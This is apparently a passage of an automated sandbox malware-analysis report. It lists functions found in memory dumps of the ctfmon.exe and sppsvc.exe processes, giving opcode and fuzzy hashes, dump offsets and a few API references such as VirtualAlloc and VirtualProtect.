Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67da49dc4d4e178a06434bab962fbeefd6ee84f561061056e209869786a2edb4
Instruction ID: 2b974ffbefa29b0022ee4e6ececeed7062c5bba5ac88789fd5bf4f5d2e68fe51
Opcode Fuzzy Hash: 67da49dc4d4e178a06434bab962fbeefd6ee84f561061056e209869786a2edb4
Instruction Fuzzy Hash: F401A135A0D7888FE712DB68D4542ED7FB0EF43310F1485E7C088DB292D5349649CB81

Function 00007FFAACBD688D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46f67cdcd0be709ce1da48bb175bfeb237a9228c0648e245f377cc3661a8720b
Instruction ID: 55cd9e69bd2191148ea03469b09cc15a27ab38e1f1853412e303e39cd8f5b156
Opcode Fuzzy Hash: 46f67cdcd0be709ce1da48bb175bfeb237a9228c0648e245f377cc3661a8720b
Instruction Fuzzy Hash: 28F0373549D7C58FC301AB748C15966BFE4EF4B215B0A82EAD089CB463D72C85868B52

Function 00007FFAACBD6850 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebbab2d8729daa6af914dc06afd19a224b52d1899145b7f81fd63f4b7d64cf6e
Instruction ID: b14afbcf51d501ca9237759461b950f429e0d974d4fc946c4705a84e7910464c
Opcode Fuzzy Hash: ebbab2d8729daa6af914dc06afd19a224b52d1899145b7f81fd63f4b7d64cf6e
Instruction Fuzzy Hash: A6F0243589C6C48FC701AB748C014957FE0EF4B116B0642E7E08DCB022D7299546C742

Function 00007FFAACBD7A09 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a94d7daaad6ef02649f0f70f47d5310b093dcbd5507fc33c1a5eca8732374a
Instruction ID: 523ee2db7c664c934ddc9c968afef613ac1f6d4530f4ecb5fdbf6853d0923181
Opcode Fuzzy Hash: e3a94d7daaad6ef02649f0f70f47d5310b093dcbd5507fc33c1a5eca8732374a
Instruction Fuzzy Hash: 3701177095C95DCFEB99DB58C864AB8BBB1FF29300F0444AEC04EEB695CA319980CB40

Function 00007FFAACBD2742 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f0ecf2f65b1fb01ed2e5bd6d11aa22d93340c3ca119a6d7e35eee36fdd34ef
Instruction ID: c1da513e9d43b4774117025e7bff1a18832bd058a41e624a0ac184b78399c03d
Opcode Fuzzy Hash: 22f0ecf2f65b1fb01ed2e5bd6d11aa22d93340c3ca119a6d7e35eee36fdd34ef
Instruction Fuzzy Hash: AEF0C23184E2C6DFE3578B70C8515E57FA4AF03200B0440F7D04ACA1A2C92D9E1AC792

Function 00007FFAAC7D0C48 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3c31d97280ae39e08df8907c5c0c7bf245d9dabf940273733a03455e66c7203
Instruction ID: dcee8a72fbcb0177e5cab3d9a78316aa45235f8dbdc8407162c5a526f899024f
Opcode Fuzzy Hash: f3c31d97280ae39e08df8907c5c0c7bf245d9dabf940273733a03455e66c7203
Instruction Fuzzy Hash: FB01527590D788CFE712DB64D4442DDBFB0AF43314F1585E7C449DB1A2D5349648CB81

Function 00007FFAACBD7E12 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b7e2f56956f626c367b4773e1f697bb2a901f30254a11ae2c9185c351215a1
Instruction ID: f5415e48fa4ac82c04415bbbdb23aedb394a1c5f357b1969d51afaeaef38432c
Opcode Fuzzy Hash: 02b7e2f56956f626c367b4773e1f697bb2a901f30254a11ae2c9185c351215a1
Instruction Fuzzy Hash: 99F0963144E2CADFE3038B70C8115D57FB8AF47204B0540E7E449DB0A3D62D5A1AC7A1

Function 00007FFAACBDCDB2 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcb197ee1d27bfd3047643a402dde1d81320d366e5cd5f52f815d58dd6e975d9
Instruction ID: 87cb28336b176ba9d5bd71023100b6e41dfe6426d339ad2be8e6322f4ca932de
Opcode Fuzzy Hash: fcb197ee1d27bfd3047643a402dde1d81320d366e5cd5f52f815d58dd6e975d9
Instruction Fuzzy Hash: 56F0903584E296DFE3029F70C8615E97FB4BF47214F1540F6D04ACB0A2DA2DA65BC7A1

Function 00007FFAACBDCA24 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7616ed5539ab4540fcfbef9be40bae49ae24fac16cee2bb77e3e6ae7565d9e41
Instruction ID: 54ad62e601c1f460e28d93a5a18750c37b6d7f306a7c2330ac8e75c1d4fa90b0
Opcode Fuzzy Hash: 7616ed5539ab4540fcfbef9be40bae49ae24fac16cee2bb77e3e6ae7565d9e41
Instruction Fuzzy Hash: 90014F70D1DA6D9EEBA9DB18C451BB8BBB0FB5A301F0441EAC04DD7682CA359A84CF51

Function 00007FFAACBD3A3F Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5531d453acf74d45bc38387f66137fa28be6aec7fe7c24df01d3ecbb2b764418
Instruction ID: d8e7f00f45a19ad5d5ff79f395cc1241d98b51159cdd503eaa8f0227e1bc0cb5
Opcode Fuzzy Hash: 5531d453acf74d45bc38387f66137fa28be6aec7fe7c24df01d3ecbb2b764418
Instruction Fuzzy Hash: 10F0BB5272DA855FE755AA2CC4556E9B790FB54200B4086BAD04FCB9C2DF25E4084781

Function 00007FFAAC7D2AFB Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc52a9ce514c82a2b89d032bcd1b66a00276562dcb2ce18603b1f1b48cbb58d
Instruction ID: 61f36f5f44520e56c31491a12282894147c67024d63f5d0d9641f3078706f19d
Opcode Fuzzy Hash: efc52a9ce514c82a2b89d032bcd1b66a00276562dcb2ce18603b1f1b48cbb58d
Instruction Fuzzy Hash: 52F0EC30648A08CFDF58DF08C894EA977F1FBA9311F14455AD44AD7260DA35E985CF81

Function 00007FFAAC7D4E05 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7211f2566b1a487dfb3b2bf0d4831ba7c81824aef09c1df1ca22df04f2918252
Instruction ID: d4014aa8cfb1c2dabafee570a9741fee89ee6432cd2b50c134a26c45b1da4f65
Opcode Fuzzy Hash: 7211f2566b1a487dfb3b2bf0d4831ba7c81824aef09c1df1ca22df04f2918252
Instruction Fuzzy Hash: 27F01D3194951ECAFB61AB04C8457F872B1AB55310F0182B6C40DD7191DE7CA9858E40

Function 00007FFAACBD3F18 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17870aa594349a472379d9a93a08778822af85762b3420dcbcddae833dcab7bd
Instruction ID: d3cfa1028e4a9f4d6dc47005db9653b27671ccd09b28df314b41718835f4bbfc
Opcode Fuzzy Hash: 17870aa594349a472379d9a93a08778822af85762b3420dcbcddae833dcab7bd
Instruction Fuzzy Hash: C0F0B424D4FA2BCAFA271714D4423F83A60AF63341F209437D40ECA0C2CD2FB80966D2

Function 00007FFAAC7D0C50 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e09995b24b1d1d2d9699d42b09c88ad6c77943865f6be4573940dda6874c9a61
Instruction ID: 34126bb7f8f75836f0258e6f9786b07227c0c08c4a8d895d6fa888bbec421572
Opcode Fuzzy Hash: e09995b24b1d1d2d9699d42b09c88ad6c77943865f6be4573940dda6874c9a61
Instruction Fuzzy Hash: F1018F3490E388CFE712DB6484842EDBFF0AF03314F1481E7C488CB292E9389A48CB81

Function 00007FFAAC7D06AD Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 767e16138265c2c16294380ea1a54cf840363bf3801424d39b8b5d6bc015609e
Instruction ID: a329a79b91314ae59a70c1190e3467ae9782a4ba2a3b8238b1afbdcc669fc7b1
Opcode Fuzzy Hash: 767e16138265c2c16294380ea1a54cf840363bf3801424d39b8b5d6bc015609e
Instruction Fuzzy Hash: A6E04F07D5F51B82F4573379A8462FC76209FC6624FD9D173E40C801C2AC0EA49E0AE6

Function 00007FFAAC7D0845 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c838dd5319b1d7713ce14ecef8484046153d5b914b44d350bcb23b09d62647
Instruction ID: 54ec9499dfce11ca08ebc8c6cf877f1e176d972934230fafb7f77cb5e9d37fe3
Opcode Fuzzy Hash: c6c838dd5319b1d7713ce14ecef8484046153d5b914b44d350bcb23b09d62647
Instruction Fuzzy Hash: CBE072263084409FC608B73CD8A05CC7BA0FF02322F8640B2E04CC2062E608D89BC382

Function 00007FFAAC7D1F58 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7432e24db60666005816ad4331846237d18def1f0b054c02f6cf81d4733bc59c
Instruction ID: 6e749bd90717d1ed925fe2b063aac641b7ff27a5cc714312ed559b92880eb292
Opcode Fuzzy Hash: 7432e24db60666005816ad4331846237d18def1f0b054c02f6cf81d4733bc59c
Instruction Fuzzy Hash: 6EE01A20E0A02A8FF7A5A714D8517BD62B5EF85310F1090F6E50ED32D2CD28ED888F81

Function 00007FFAAC7D0B9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2f21b14d59328ef1b7d7828e20e9a15676930dc036653e79af614fd5a0ecdb
Instruction ID: f5344e562cf8c09b9a08d6c9a5d0ede39469c35fbf39e0415bd6ba11f060fea0
Opcode Fuzzy Hash: 2e2f21b14d59328ef1b7d7828e20e9a15676930dc036653e79af614fd5a0ecdb
Instruction Fuzzy Hash: EFC0123066980E8FEA40FB2CC888924BBA0FB4E301BD940E0E00CCB1A1D61998948B41

Function 00007FFAAC7D6413 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e24615e9e9c9c9a026930fa19fba8bc50b11302def63e7bdff8fff8633dfb5e
Instruction ID: 79fcc17dae95644dab355544fd422dd7ce4bdcfb265c573730c2540270e6c64b
Opcode Fuzzy Hash: 2e24615e9e9c9c9a026930fa19fba8bc50b11302def63e7bdff8fff8633dfb5e
Instruction Fuzzy Hash: 5BD0C705B0E55B5BF25A53284475BFE1F564F86114F0884F5E04DDB596CD0C550603CA

Function 00007FFAAC7D0B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ab9ec2380bb13ddba8309d025815d825ca00bc7cc9cb19f1a28d162cd8ad11
Instruction ID: b0b24998ba30a663347eb7e48d49396450d4e57478966060f6ec5e201b174aa4
Opcode Fuzzy Hash: 74ab9ec2380bb13ddba8309d025815d825ca00bc7cc9cb19f1a28d162cd8ad11
Instruction Fuzzy Hash: B7C08C304118088FC900E72DC884A0032B0FB0E310BC10090E00DCB170E21ADCC4CB80

Function 00007FFAAC7D25D6 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb4ae7b81ee55555db2498eef9f9c20816f7ce33d2fa04967d83384bb2b5c1b
Instruction ID: 9755113c8f508f608fef4b8d1fd86a4b6f185ca3ee35b018e78ab05b66701c9f
Opcode Fuzzy Hash: 4fb4ae7b81ee55555db2498eef9f9c20816f7ce33d2fa04967d83384bb2b5c1b
Instruction Fuzzy Hash: C7D0C914E0A54A8BFA86633484562FE16A29B86320F449476A80E8B3C2DC2CA8490EC1

Function 00007FFAACBD958B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db05883e8256f2eb88c4c502712a9d8f1714400b0e2e1e1de06161b47c85856a
Instruction ID: ed3a4515c0d72f69bd59d8e01c8ed95e82397610523a4ce9278f67f396d00ae5
Opcode Fuzzy Hash: db05883e8256f2eb88c4c502712a9d8f1714400b0e2e1e1de06161b47c85856a
Instruction Fuzzy Hash: A0D09214E1F623C9F22A5B01C12037A16905F56304E64867FC05F499C1EE1FF8496289

Function 00007FFAACBD6AB5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1486376971.00007FFAACBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaacbd0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction ID: 5e75d72ae6e9c63023c6c569fcdcce703503bd89d95babd04dbabe6ee0fe48f1
Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction Fuzzy Hash: 39C04C30204914DFDB84DB4DC0D473873D1EF5E301B5044B5E04ECF2A5C529DC499710

Function 00007FFAAC7D63CD Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95a7f96c037b01f9a4728524eb5a65b81682312d3522ba620e252df53a1d1e27
Instruction ID: 262569af39ca96fd8e5541cae062996de83dad4766503a83567b31598965d7a0
Opcode Fuzzy Hash: 95a7f96c037b01f9a4728524eb5a65b81682312d3522ba620e252df53a1d1e27
Instruction Fuzzy Hash: BCC04C56F1991E5BF2596328803577D08565F85714F5484B9E00ECA6D6CD1C590203C6

Function 00007FFAAC7D06D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction ID: 104fee4a7b1ef654d16b87d503b06f30996fa98851d997c141cb4bec31552082
Opcode Fuzzy Hash: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction Fuzzy Hash: 13B01210CAB44F40F40A337B084627474709B46108FC45171D40C40281984D509C06C2

Function 00007FFAAC7D2D4D Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1478813682.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ffaac7d0000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction ID: 418c62bdd62d962657d3243a815e604849c95374a732a90c98d20eaf7c3b4583
Opcode Fuzzy Hash: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction Fuzzy Hash:

Analysis Process: sppsvc.exePID: 5260, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAAC7B0D47 Relevance: 1.6, Strings: 1, Instructions: 333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5Z_H, xrefs: 00007FFAAC7B0DF3

Memory Dump Source

Source File: 00000015.00000002.1488475881.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac7b0000_sppsvc.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: 9c9d98a1f9ec427e406c9513328ed1f6b6263f4f14be7c59aa0896df9e4ef627
Instruction ID: 66bbf1354ab5429634635a03fdf6ab8bc45a991c108675813bc4ecf05e2b0ccb
Opcode Fuzzy Hash: 9c9d98a1f9ec427e406c9513328ed1f6b6263f4f14be7c59aa0896df9e4ef627
Instruction Fuzzy Hash: E5B117B1A0D6898FE789AB6888697B97FF1EB56310F4480BAD04EC72D3DE785845C740

Function 00007FFAACBB977F Relevance: .6, Instructions: 553COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1507358309.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaacbb0000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35e7d7e7feedf0677d2c12ebdf565b4247dd28f168fbb6b8740b60c6d81b32da
Instruction ID: 991b1c42534a8352ddbe553544dadc8ca7e01b28b625c9b0152b687a1e4f27b9
Opcode Fuzzy Hash: 35e7d7e7feedf0677d2c12ebdf565b4247dd28f168fbb6b8740b60c6d81b32da
Instruction Fuzzy Hash: 6522CE30D19669CFEB58DB58C4A46B87BB1FF45300F5081BDC45EC7687CA3AA885CB80

Function 00007FFAAC7BB16A Relevance: 1.6, APIs: 1, Instructions: 141
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFAAC7BB24D

Memory Dump Source

Source File: 00000015.00000002.1488475881.00007FFAAC7B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac7b4000_sppsvc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3c5eadcc53902e86fe288f2f0dd6e8c855cc1937c4d2835f63498aa070969488
Instruction ID: da5cc1c3c92b599949d4a4196700e03bba8aaf6dc64c9fe20ab2734cfff49b52
Opcode Fuzzy Hash: 3c5eadcc53902e86fe288f2f0dd6e8c855cc1937c4d2835f63498aa070969488
Instruction Fuzzy Hash: C441C83190D7898FD71ADBA898066E97FF1EF56321F0442AFD09AC31A3DE7464068792

Function 00007FFAAC7EFC30 Relevance: 1.5, Strings: 1, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_, xrefs: 00007FFAAC7EFC3C

Memory Dump Source

Source File: 00000015.00000002.1488475881.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac7e0000_sppsvc.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 2fc08079332a21f8efe3e762cbd12a7132d7734eb15db7323aa21959f1274b08
Instruction ID: 94eff5d5e0689846066d598de5dd2e75ec0be34759a2215680afebdac8823364
Opcode Fuzzy Hash: 2fc08079332a21f8efe3e762cbd12a7132d7734eb15db7323aa21959f1274b08
Instruction Fuzzy Hash: 5E610562A2DA4A8FF755E76C98592753BA1FFD630071481BAD00DC759ADE24EC0A43C1

Function 00007FFAACBB92F8 Relevance: 1.4, Strings: 1, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFAACBB9372

Memory Dump Source

Source File: 00000015.00000002.1507358309.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaacbb0000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 61e296ae66cbd5ba68d892a7d6f456cf323d1c98ed029248f424363431971fbb
Instruction ID: 7161548e8bfd57b2d9e5fcefe24c23155c0a504bbbdd125f988748fdb4307fb5
Opcode Fuzzy Hash: 61e296ae66cbd5ba68d892a7d6f456cf323d1c98ed029248f424363431971fbb
Instruction Fuzzy Hash: C5517D71D0965ADFEB59CBA8C4515FDBBB1EF46300F1081B9C01EE7292CE39A909CB91

Function 00007FFAACBB4A48 Relevance: 1.4, Strings: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFAACBB4AB2

Memory Dump Source

Source File: 00000015.00000002.1507358309.00007FFAACBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaacbb0000_sppsvc.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7d01360b3560f7b99919568b8cf54b7b32e7027978693ec2e8bf08ad3fd30221
Instruction ID: 9d0b88021d4b0091cd336a38eb2d6e9262ab76cc0a05efd49cf70954e1b7ede4
Opcode Fuzzy Hash: 7d01360b3560f7b99919568b8cf54b7b32e7027978693ec2e8bf08ad3fd30221
Instruction Fuzzy Hash: 79410670D1961ACFEB19CB94C4955FDBBB1FF45300F1080AAD01EA7286CE39A905CF84

Function 00007FFAAC7BC141 Relevance: 1.4, APIs: 1, Instructions: 124
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFAAC7BC1F4

Memory Dump Source

Source File: 00000015.00000002.1488475881.00007FFAAC7B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac7b4000_sppsvc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 66d9f0966a970d235eb9ac7db7ab9802afafb28e70217d0eeb333dd25b8bc8b6
Instruction ID: 076e3e566a289a43f0e675a34988b3e25e3ecf0383afad7861126f8316bbcc18
Opcode Fuzzy Hash: 66d9f0966a970d235eb9ac7db7ab9802afafb28e70217d0eeb333dd25b8bc8b6
Instruction Fuzzy Hash: 2331C77190CA4C9FEB19AB6898066F97BF0EF56321F00827FD04ED3553DA64A81687C5

Function 00007FFAAC7E19F4 Relevance: 1.3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(L!, xrefs: 00007FFAAC7E19F5

Memory Dump Source

Source File: 00000015.00000002.1488475881.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffaac7e0000_sppsvc.jbxd

Similarity

API ID:
String ID: (L!
API String ID: 0-1359532180
Opcode ID: 9cb44ea3fe282c8a0c8647e164ec5d0a5b890410a10166c6f149d0b82ded4785
Instruction ID: 09a4fb22253318b912f61b7c8b30bee7ffd26ff6be8181088927eb15316e2a77
Opcode Fuzzy Hash: 9cb44ea3fe282c8a0c8647e164ec5d0a5b890410a10166c6f149d0b82ded4785
Instruction Fuzzy Hash: 9221A473A1C6518FE718AB1C945A37936D1FB99704F0446BDE08ED32C3DE2C9D4686CA

Function 00007FFAAC7E0A11 Relevance: 1.3, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00007FFAAC7E09C6

Memory Dump Source

